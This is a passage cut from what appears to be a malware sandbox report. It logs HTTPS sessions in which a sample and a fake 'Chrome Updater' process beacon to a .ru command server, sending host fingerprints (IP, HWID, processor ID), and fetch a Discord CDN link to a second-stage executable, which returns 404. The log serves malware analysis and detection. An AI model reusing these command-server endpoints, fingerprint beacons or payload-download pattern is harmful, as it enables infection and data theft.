                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2EXv7CKEO%2FYOpmnQlD8poR82IepKA1XfchW9asgIzay1tv7v4PwxGPIeSfDNbHxa5Fu3foMog8Ba2yOPFHKQd%2FtGzhKmeXCyFn4i4cp6bYQGGZFhzGFJTwVnIwiOXNiXwZZBIuZu"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7008e792d21-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:39 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    68192.168.2.649789104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:38 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:39 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:39 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XOqbRhfHZJ4Dw10KrW%2BHXXFu5a9Qo6HjtdzAnciT2C8bZI5FHz%2BJeqBlKs8x92X0BYzOWZOImfboBbPmneMQDjRMMuR4Jo3XRkl0nhMeq0W2CUU5Kb68m26%2FY8xmUd5luw8WpcTF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c702c97707f9-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:39 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    69192.168.2.649790104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:39 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:40 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QmDFN3irw38ca3p6li4G6LC9tJlPb52%2FrbMKhonxyJANC7U455nLkO6d58ojokXB%2Fd9%2ByRvgIRonhSxmX0MiubeR5kY3QlSwV%2F0jIEfHmgrId%2Bka9obgyISZWzPookllzad%2FmZ42"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7063fd637ee-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:40 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    70192.168.2.649791104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:39 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:40 UTC607INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5hk1gtMq8xq8SJBAxSD%2B%2FDGr%2F%2FNEXxFBo06aaQpPvJTC6FXdd4%2FxZiMl8D%2FVgzloUzO%2FvfXMjvMqFTdU9eNfygKzi6Zcinqi1Qx6I9x6vo7JmOmFiAiZGOCR70jz0H4SkOb5504X"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7085fdc20ae-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:40 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    71192.168.2.649792162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:40 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:40 UTC1324INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:40 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c70bdce159c1-IAD
                                                                                    CF-Cache-Status: MISS
                                                                                    Accept-Ranges: bytes
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:40 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPoZOmZ85WzNRXjW2ndttcfb4eP9EIBBMbydtvRdPl58LDIjN51wGDYCvkXSZyQ0wMNTHA
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=dRBTnzdLiYRDgRvQIbpkAInCmejj8wsl4QMDDHjg8z0-1704353440-1-Ac46LoTjc0St/S6xwYjumjV7HYeaTDXprk46e4/7FYIKoF0rlK0AEf6Ju8HhNF/udLVRt3+gzt+QUmjfnJ0tnk0=; path=/; expires=Thu, 04-Jan-24 08:00:40 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P29xPLthzR3TzS9MXmMXX0gd9TSgOcpoJ7mjASrGZTjWtd4skTejN2kLylqpGyYPhA185sMoa8Gxzv9VAH4osYbcRchlXG00uSGzRKdV7UCJVVG%2Fg9%2F%2FATRkJChCS9B1EaDZfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=UcHXbiiRq3MWis.es5wQVfySX3ErJ0FyJ.7mAWaX4FM-1704353440672-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:40 UTC45INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error>
                                                                                    2024-01-04 07:30:40 UTC191INData Raw: 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    72192.168.2.649793162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:40 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:40 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:40 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c70c8e191fdd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 22
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:40 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=ET7H22EWY6zV7Ugo.7959nvYK2wqzAsC.7Ph3n1nu.I-1704353440-1-ASTyiGYEhyFWkqo6wp7GMKdR/4SuLwsRlBPrNjCvz4OP50Ql03NkD3IUNl6AAZcYLuh7bK3MwrpaYhUsFmkBX08=; path=/; expires=Thu, 04-Jan-24 08:00:40 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1k%2FmEhAGhWcJGYCk%2FWDGLB6tcG6JTBseGneiar9Hc6UNhsdrEQdj2deCvqNtIH3DN%2Fo6DDdGCctDk6X1wYd8xaWqdvvnaxiM9ZvAtplqcWAF8YQM%2BIDJzyf8YQ8HrMdx%2Bi4TlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=XEtGludzxuhXy0uMRRxMlf_PXf60jH7Q4m.zPErSHJw-1704353440745-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:40 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
                                                                                    2024-01-04 07:30:40 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    73192.168.2.649794104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:41 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:41 UTC572INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DRttroWsoo1MhvKbAZ4xkOtW7btrkFiKOtqfo36vbF990bBsivN8ACz1cqV9z3KToI6o6lOPEvUIJIpu%2Bk0IsZAoUuMWtcDzebsnb10EiIK1m7TCH2Y2eo6Qzb0WThVOnsDNt2Ds"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c70f9ed32414-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:41 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    74192.168.2.649795104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:41 UTC165OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:41 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QzNXbswNOrIz9zd6YBP%2FtC6HvYhhVvZ8rTWi9HSrvUpGJxxlmveLqD46z2FqIkJfA3QY%2FVP1%2FCTarf10FDMu1flX2nQtYATKfelOHUuI62Dw0hHR1r9feElUsK0Gv5NLLbeJOxkM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c710082181ac-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:41 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    75192.168.2.649796104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:41 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:42 UTC605INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wV%2FmaS9c8FeSu8v5vEu4X32r9%2FntA3OHkV%2Bj%2B6FWd2GSRuscN8UiE2p%2B5Pf1Cn47niUyPVOyrGrLm8T6E%2BL3JDZ70LhQL6JBPm4Ejo58bd2bZ1lcxxpZC63yuvvF8xv8xCgRmxWe"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c71488540784-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:42 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    76192.168.2.649797104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:41 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:42 UTC595INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FP6eXUE3wzRhb8I3vjZL6A2Oh1YLCfOvcM5n1iRfTgP1CcBPFu8VkBMmazZY9w8k%2FxpY0RdFvDDaM3aeSe6EPWM7RCZzG5egdi5ZwpET6e2eKcvDe1xM4O9uhIbQR258gig1uwgE"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c7153f18084e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:42 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    77192.168.2.649798162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:42 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:42 UTC1350INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:42 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c719fca06fb5-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 15
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:42 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=47ZJDCGR9e5It0ixvijNX9lzMK2FhYAX06KkrdWVTK4-1704353442-1-AQ9MDeODe1qTPlgdD1HTfdj7ws4twmzuF3HAm/aDgGkWmjD0jxULp6j/Yo8jdwBiHbvVNCf0JTxbyqw4QHMg5ZA=; path=/; expires=Thu, 04-Jan-24 08:00:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3wHCxHgDyxjQLki7eJ44wAYEZGqKUL6Eu4e92mFgFIrlMpjfmp29hSQpjnCjN%2FfO%2BPG7xw%2BGnljZk3Ui9j6fXJd%2BBshpsDwU%2BqVxI3zsb8Di06%2B%2BWtzZsAOUa46B6A%2BfPPNS3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=sMCYlM_Mpw.Y1p0q9.reY5o80ouZAF9.NOVwC585sOg-1704353442900-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:42 UTC19INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27
                                                                                    Data Ascii: <?xml version='1.0'
                                                                                    2024-01-04 07:30:42 UTC217INData Raw: 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    78192.168.2.649799162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:42 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:43 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:43 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c71acc1281e1-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 16
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:43 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=sbqP4yKr8pmNeO9Cp1Nquva2uwpVYKgp0ncUTRmga50-1704353443-1-ATt4b1rl/8kkmN4cUO7R9Ij8trnE+ael7ThhpXagIKIg4oAe6Dg1hk7lR5EN4s/T+/xNm3Ehgv8oNCOWve33L3I=; path=/; expires=Thu, 04-Jan-24 08:00:43 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QwQPyVAqYCXns5M6NSkTzeRitXIDj5ILWjkA4xn1Tx5CAhfhssRJ%2FqSZIvMKrVMc1zaxyiu36FgplvRenln%2Fv6FA%2B1jtflF6welWagQKNYPpR9L520Hht6dF7nPzHww1dQY9eA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=TQLM7UyXZvbE0tYhvMojh0xbLTuitHsWqiMfckemzdI-1704353443028-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:43 UTC29INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d
                                                                                    Data Ascii: <?xml version='1.0' encoding=
